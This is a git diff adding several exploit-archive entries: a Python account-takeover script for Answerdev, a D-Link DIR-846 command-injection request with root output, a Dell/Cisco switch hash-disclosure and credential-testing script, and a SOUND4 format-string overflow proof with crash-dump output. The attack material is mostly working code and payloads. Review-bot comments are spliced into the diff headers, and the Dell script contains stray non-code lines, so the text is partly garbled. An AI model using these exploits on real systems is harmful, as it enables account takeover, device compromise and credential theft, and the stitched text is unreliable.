diff --git a/exploits/go/webapps/51257.py b/exploits/go/webapps/51257.py
new file mode 100755
index 000000000..646915953
--- /dev/null
+++ b/exploits/go/webapps/51257.py
@@ -0,0 +1,31 @@
+# Exploit Title: Answerdev 1.0.3 - Account Takeover
+# Date: Reported on Jan 24th 2023
+# Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp
+# Vendor Homepage: https://answer.dev/
+# Software Link: https://github.com/answerdev/answer
+# Version: 1.0.3
+# Tested on: Ubuntu 22.04 / Debian 11
+# CVE : CVE-2023-0744
+
+
+from sys import argv
+import urllib3
+from requests import post
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+def ato(url: list, email: str) -> str:
+ try:
+ return f"Your Link: {''.join(url)}users/password-reset?code=" + \
+ post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"]
+ except Exception as err:
+ return f"Cant reach URL: {err}"
+
+
+if __name__ == "__main__":
+ if len(argv) != 3:
+ print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")
+ exit()
+
+ print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))
\ No newline at end of file
diff --git a/exploits/hardware/remote/51243.txt b/exploits/hardware/remote/51243.txt
new file mode 100644
index 000000000..00762afa6
--- /dev/null
+++ b/exploits/hardware/remote/51243.txt
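Review bot: The `post()` call inside `ato` has no `timeout`, so an unresponsive host blocks the script indefinitely, and the bare `except Exception` then reports every failure — a non-2xx status, a non-JSON body, a missing `"data"` key — as `Cant reach URL`, which misdescribes what actually happened. Splitting the request from the parsing makes the failure visible: `resp = post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False, timeout=10)` followed by `resp.raise_for_status()` before `.json()["data"]`, with the handler narrowed to `requests.exceptions.RequestException` and `KeyError`/`ValueError` reported as a malformed response rather than an unreachable host. The `url: list` parameter is only ever a one-element list that the body immediately flattens with `''.join(url)`; a plain `str` parameter would state the contract honestly. `verify=False` together with the module-level `disable_warnings` accepts any certificate; if that is intentional for a lab tool it deserves a one-line comment saying so.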
@@ -0,0 +1,87 @@
+# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability
+# Google Dork: NA
+# Date: 30/01/2023
+# Exploit Author: Françoa Taffarel
+# Vendor Homepage:
+https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
+# Software Link:
+https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
+# Version: DIR846enFW100A53DBR-Retail
+# Tested on: D-LINK DIR-846
+# CVE : CVE-2022-46552
+
+D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote
+command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist
+parameter. This vulnerability is exploited via a crafted POST request.
+
+### Malicious POST Request
+```
+POST /HNAP1/ HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
+Firefox/107.0
+Accept: application/json
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
+HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
+Content-Length: 171
+Origin: http://192.168.0.1
+Connection: close
+Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
+Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;
+PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4
+
+{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
+```
+
+
+### Response
+
+```
+HTTP/1.1 200 OK
+X-Powered-By: PHP/7.1.9
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-type: text/html; charset=UTF-8
+Connection: close
+Date: Thu, 01 Dec 2022 11:03:54 GMT
+Server: lighttpd/1.4.35
+Content-Length: 68
+
+{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
+```
+
+
+### Data from RCE Request
+
+```
+GET /HNAP1/rce_confirmed HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
+Firefox/107.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;
+PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
+Upgrade-Insecure-Requests: 1
+```
+
+
+### Response
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/octet-stream
+Accept-Ranges: bytes
+Content-Length: 24
+Connection: close
+Date: Thu, 01 Dec 2022 23:24:28 GMT
+Server: lighttpd/1.4.35
+
+uid=0(root) gid=0(root)
+```
\ No newline at end of file
diff --git a/exploits/hardware/remote/51248.py b/exploits/hardware/remote/51248.py
new file mode 100755
index 000000000..e1e4b3929
--- /dev/null
+++ b/exploits/hardware/remote/51248.py
@@ -0,0 +1,107 @@
+# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
+# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US
+https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos
+
+
+# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
+# Discovered by Ken 's1ngular1ty' Pyle
+
+
+# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
+# Discovered by Ken 's1ngular1ty' Pyle
+
+
+import requests
+import re
+import hashlib
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+if len(sys.argv) < 3:
+ print("Usage: python cve-2019-15993.py URL passwordfile")
+ sys.exit()
+
+url = sys.argv[1]
+file = sys.argv[2]
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def hash_value(value):
+ """Calculate the SHA1 hash of a value."""
+ sha1 = hashlib.sha1()
+ sha1.update(value.encode('utf-8'))
+ return sha1.hexdigest()
+
+def userName_parser(text, start_delimiter, end_delimiter):
+ results = []
+ iteration = 0
+ start = 0
+ while start >= 0:
+ start = text.find(start_delimiter, start)
+ if start >= 0:
+ start += len(start_delimiter)
+ end = text.find(end_delimiter, start)
+ if end >= 0:
+ results.append(text[start:end])
+ start = end + len(end_delimiter)
+
+ iteration = iteration + 1
+ return results
+
+# retrieve the web page
+response = requests.get(url, allow_redirects=False, verify=False)
+
+# Read in the values from the file
+with open(file, 'r') as f:
+ values = f.readlines()
+
+values = [value.strip() for value in values]
+hashes = {hash_value(value): value for value in values}
+
+if response.status_code == 302:
+ print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
+ url = response.headers["Location"] + "config/device/adminusersetting"
+ response=requests.get(url, verify=False)
+
+ if response.status_code == 200:
+ print("[*] Successful request to URL:", url + "\n")
+ content = response.text
+ users_names = userName_parser(content,"","")
+ sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)
+
+ print("SHA1 Hashes found:\n")
+
+ loops = 0
+ while loops < len(sha1_hashes):
+ print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")
+
+
+ for sha1_hash in sha1_hashes:
+ if sha1_hash in hashes:
+ print("Match:", sha1_hash, hashes[sha1_hash])
+ print("\nTesting Credentials via API.\n\n")
+ payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])
+
+ response_login = requests.get(payload, allow_redirects=False, verify=False)
+ headers = response_login.headers
+ if "sessionID" in headers:
+ print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")
+ print(headers["sessionID"])
+ else:
+ print("Unable to sign in.")
+ loops = loops + 1
+ else:
+ print("Host is not vulnerable:", response.status_code)
+
+
+
+
+
+
+[cid:2b37ad37-9b26-416d-b485-c88954c0ab53]
+ Ken Pyle
+ M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+
+ Main: 267-540-3337
+ Direct: 484-498-8340
+ Email: kp@cybir.com
+ Website: www.cybir.com
\ No newline at end of file
diff --git a/exploits/hardware/remote/51259.txt b/exploits/hardware/remote/51259.txt
new file mode 100644
index 000000000..dbe3274a4
--- /dev/null
+++ b/exploits/hardware/remote/51259.txt
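Review bot: The new file cannot be parsed as Python: the third line (`https://sec.cloudapps.cisco.com/...`) is a bare URL outside any comment, and an e-mail signature (`[cid:...]`, `Ken Pyle`, `M.S. IA, ...`, phone and web lines) is committed after the final `print`; the `print("Cisco / Netgear / ...")` literal at the top of the 302 branch also appears broken across two lines, which may be an artefact of how the hunk was captured, whereas the first two are not. Independently, `userName_parser(content, "", "")` is called with empty delimiters: `str.find("", start)` returns `start`, so `start` never advances and the `while start >= 0` loop appends `""` to `results` without end; the delimiters look as if they were stripped as markup on the way into the archive, and the parser should refuse the degenerate case with `if not start_delimiter or not end_delimiter: return results` before the loop. `iteration` is incremented on every pass and never read. The outer `while loops < len(sha1_hashes)` combined with the inner `for sha1_hash in sha1_hashes` re-tests every hash for every index and raises `IndexError` when `users_names` is shorter than `sha1_hashes`; the flattened indentation in the hunk makes the exact nesting hard to confirm, but pairing the two lists with `zip` would express the intended one-to-one relation.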
@@ -0,0 +1,330 @@ +# Exploit Title: SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow +# Exploit Author: LiquidWorm + + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: 1.1.2 + +Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that +allow users to remotely control SOUND4 processors through a network connection. +SOUND4 offers a tool that manage sending L&S commands to your processors: +the Link&Share Transmitter. + +Desc: The application suffers from a format string memory leak and stack +buffer overflow vulnerability because it fails to properly sanitize user +supplied input when calling the getenv() function from MSVCR120.DLL resulting +in a crash overflowing the memory stack and leaking sensitive information. +The attacker can abuse the username environment variable to trigger and +potentially execute code on the affected system. + +--------------------------------------------------------------------------- +(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) 
+eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 +eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 +MSVCR120!_invoke_watson+0xe: +645046b1 cd29 int 29h +--------------------------------------------------------------------------- + +Tested on: Microsoft Windows 10 Home + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5744 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php + + +26.09.2022 + +-- + + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file +02/02/23 17:06:19 : Background launch: User: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd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fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + + +--- + + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe + +(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) +eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 +eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 +MSVCR120!_invoke_watson+0xe: +645046b1 cd29 int 29h +0:000> kb + # ChildEBP RetAddr Args to Child +00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] +01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85] +02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96] +03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690] +04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138] +*** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe +*** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe +05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 
[f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190] +WARNING: Stack unwind information not available. Following frames may be wrong. +06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 +07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f +08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 +09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed +0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 +0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f +0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b +0:000> !analyze -v +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +GetUrlPageData2 (WinHttp) failed: 12002. +DUMP_CLASS: 2 +DUMP_QUALIFIER: 0 +FAULTING_IP: +MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] +645046b1 cd29 int 29h + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e) + ExceptionCode: c0000409 (Security check failure or stack buffer overrun) + ExceptionFlags: 00000001 +NumberParameters: 1 + Parameter[0]: 00000005 +Subcode: 0x5 FAST_FAIL_INVALID_ARG + +FAULTING_THREAD: 000059e8 +DEFAULT_BUCKET_ID: FAIL_FAST_INVALID_ARG +PROCESS_NAME: LinkAndShareTransmitter.exe +ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. +EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. 
+EXCEPTION_CODE_STR: c0000409 +EXCEPTION_PARAMETER1: 00000005 +WATSON_BKT_PROCSTAMP: 6144495e +WATSON_BKT_PROCVER: 1.1.0.2 +PROCESS_VER_PRODUCT: Sound4 Link&Share Transmitter +WATSON_BKT_MODULE: MSVCR120.dll +WATSON_BKT_MODSTAMP: 577e0f1e +WATSON_BKT_MODOFFSET: a46b1 +WATSON_BKT_MODVER: 12.0.40660.0 +MODULE_VER_PRODUCT: Microsoft® Visual Studio® 2013 +BUILD_VERSION_STRING: 10.0.19041.2364 (WinBuild.160101.0800) +MODLIST_WITH_TSCHKSUM_HASH: 938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5 +MODLIST_SHA1_HASH: 5990094944fb37a3f4c159affa51a53b6a58ac20 +NTGLOBALFLAG: 70 +APPLICATION_VERIFIER_FLAGS: 0 +PRODUCT_TYPE: 1 +SUITE_MASK: 784 +DUMP_TYPE: fe +ANALYSIS_SESSION_HOST: LAB17 +ANALYSIS_SESSION_TIME: 01-29-2023 16:09:48.0143 +ANALYSIS_VERSION: 10.0.16299.91 x86fre +THREAD_ATTRIBUTES: +OS_LOCALE: ENU + +PROBLEM_CLASSES: + + ID: [0n270] + Type: [FAIL_FAST] + Class: Primary + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [Unspecified] + Frame: [0] + + ID: [0n257] + Type: [INVALID_ARG] + Class: Addendum + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [Unspecified] + Frame: [0] + +BUGCHECK_STR: FAIL_FAST_INVALID_ARG +PRIMARY_PROBLEM_CLASS: FAIL_FAST +LAST_CONTROL_TRANSFER: from 64504677 to 645046b1 + +STACK_TEXT: +0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe +0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a +0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc +0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 +0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 +0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 +WARNING: Stack unwind information not available. Following frames may be wrong. 
+0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 +0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f +0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 +0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed +0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 +0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f +0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b + +STACK_COMMAND: ~0s ; .cxr ; kb +THREAD_SHA1_HASH_MOD_FUNC: 0b8f8316052b30cae637e16edbb425a676500e95 +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 359d5607a5627480201647a1bc659e9d2ac9281f +THREAD_SHA1_HASH_MOD: 2418d74468f3882fef267f455cd32d7651645882 + +FOLLOWUP_IP: +MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] +645046b1 cd29 int 29h + +FAULT_INSTR_CODE: 6a5629cd +FAULTING_SOURCE_LINE: f:\dd\vctools\crt\crtw32\misc\invarg.c +FAULTING_SOURCE_FILE: f:\dd\vctools\crt\crtw32\misc\invarg.c +FAULTING_SOURCE_LINE_NUMBER: 132 +SYMBOL_STACK_INDEX: 0 +SYMBOL_NAME: MSVCR120!_invoke_watson+e +FOLLOWUP_NAME: MachineOwner +MODULE_NAME: MSVCR120 +IMAGE_NAME: MSVCR120.dll +DEBUG_FLR_IMAGE_TIMESTAMP: 577e0f1e +BUCKET_ID: FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e +FAILURE_EXCEPTION_CODE: c0000409 +FAILURE_IMAGE_NAME: MSVCR120.dll +BUCKET_ID_IMAGE_STR: MSVCR120.dll +FAILURE_MODULE_NAME: MSVCR120 